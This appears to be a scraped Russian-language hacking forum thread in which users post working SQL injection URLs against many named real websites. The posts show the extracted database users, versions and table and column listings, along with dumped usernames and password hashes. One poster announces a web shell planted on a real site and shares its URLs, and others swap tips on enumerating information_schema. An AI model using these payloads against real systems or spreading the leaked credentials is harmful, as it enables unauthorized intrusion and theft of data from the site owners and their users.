Code: http://www.superchrono.com/index.php?main_page=customer_testimonials&testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/* master@localhost:zenc:4.1.20 root:0015e5715c9d1718 vpopmail:1fbced3233935493 adminlink:186384a54d6ca922 master:5e80e4ce3bd7ea43 zic3cn:7231449d61b83801 zic2:7231449d61b83801 zicmasteruser:7231449d61b83801 Code: http://store.workshopsupply.com/catalogue/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/* workshop_admin@localhost:workshop_workshopsupply:5.0.45-community-log Code: http://www.mrgadget.com.au/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7/* [email protected]:mrgad_db:4.1.22-standard-log Code: http://www.bodyguardforwomenhearts.com/store/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/* bodyg_shop@localhost:bodyg_shop:4.1.22-standard-log Code: http://www.247av.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/* kunal060912@localhost:247av_com_-_newosc:4.1.22-standard
Черт, народ, это ханипот чтоли?) Мне понравилась страница, выскакивающая при подставлении на сайте кавычки. http://www.hauteecole.ru/ru/horses.php?sid=0&id=5 Но ссылка заинтересовала. Таки скуля? *ушла искать как обойти эту фильтрацию*)))
Code: http://www.alparysoft.ru/products.php?id=10&item=14+union+select+1,2,3,4,5,6,7,8,9,10,version,12,13,14,15,16,17,18,19,20,21,22,23/*
2xcedz если мускул >= 5 то можно работать через information_schema итд... потом таким же образом вытаскиваеш названия колонок (column_name)
Code: http://www.celadon-international.com/place.php?id=-1+union+select+1/* http://www.travel-to-peloponese.com/place.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17/*
2xcedz and 2Mobile Вы тему смотрите вообще? 0_o На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов... ___________________________ Added: Чтобы в тему: http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,name,pwd,userid),8,9,10,11,12,13,14,15/* Ну и лимитом выводим..
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/haute/domains/hauteecole.ru/public_html/shop/template/header.php on line 60 Мальчики, неужели вы обьявите мне игнор? тут: http://shop.hauteecole.ru/news.php?id=1' Пыталась запросы вида: http://shop.hauteecole.ru/news.php?id=1'+select+union+1,2,3,4,5,6/* Или так, хотя один ли фиг: http://shop.hauteecole.ru/news.php?id=1'%20select%20union%201,2,3,4,5,6/* Мальчики, скажите мне, блондинке, как заставить этот долбаный мускуль выдать хоть какие-то результаты? Тупо подбирать столбцы, или надо извращаться?
Залил шел на www.miheeff.ru мож кому надо, у него и подсайтов многа. http://dvd.miheeff.ru/aaadmin.php http://sms.miheeff.ru/sms_en.php http://miheeff.ru/php.php
Code: http://www.dedefensa.org/choix.php?comm=1&link_id=99999+union+select+1,2,3,4,5,6,7,8,9/* dedefensa@localhost:dedefensa:5.0.45
2 Digital Cat Не плачь =) HTML: http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/* 5.0.22:haute_shop@localhost:haute_shop
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat(password,char(58),login,char(58),id)+from+users/* fe83361168623c81f8a8f11a8270ef7b:Liliya1976:2 http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3A,table_schema,TABLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+limit%2028,13/* Таблы CHARAKTER SETS, collations, COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS about basket catalog delivery finance news orders pages params payment structure typegoods users http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+column_name+from+information_schema.columns%20limit%204,1/* колонки CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN COLLATION_NAME NO COMENTS IN MY POST
http://www.superherohype.com/news/300news.php?id=-4610+union+select+concat_ws(0x3a,version(),user(),database())/* Смотрим в заголовок, где и выводится инфа ЫЫЫЫЫ Суперхер...
нафиг мне смотереть кучу однообразных инъекций? просто я решил объяснить челу про information.schema а он оказывается уже знает...
Code: http://www.doktor-al.ru/get_news.php?news_id=99999+union+select+1,2,3,4,5,6,7/* doctor_al_ru@localhost:doctor_al_ru:5.0.24a Code: http://www.daoctemplates.net/viewUser.php?UserID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,username,password,email),29,30,31,32,33+from+users/* daoctemplates@localhost:daoctemplates:4.1.20
http://www.upvaft.org/articles/index.php?id=-54+union+select+1,2,3,4,concat_ws(0x3A3a,version(),user(),database()),6,7,8,9,10,11/* 4.1.22-standard::upvafto_php@localhost::upvafto_content Таблицы не искал, нет времени.
PHP: http://topmanagement.com.mx/modules.php?name=Noticias&file=seccion&idseccion=-1+union+select+aid+from+nuke_authors--
http://artslivres.com/ShowArticle.php?Id=-1+union+select+0,1,2,3/* Хз как дальше- вроде пральное число столбцов,а пишет неизвестное число.В конце пишет 0,0- хрень...
Code: http://www.shejay.net/artistDetail.php?userID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* web84_u1@localhost:web84_db1:5.0.32-Debian_7etch4-log Code: http://moshonka.ru/anketka.php?userid=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* [email protected]:db20:5.0.45-Debian_1 Code: http://www.basketball.ru/netcat/modules/user/profile.php?userid=99999+union+select+1,2,3,4,5,6,7/* Code: http://www.rematico.com/shop.php?userid=99999'+union+select+concat_ws(0x3a,user(),database(),version()),2,3/* usr_phpprobid@localhost: DB_phpprobid:4.1.20 Code: http://teams.supercheats.com/category.php?cid=1'+union+select+1,2,3/* webuser@localhost:supercheats_forum:4.1.20 Related
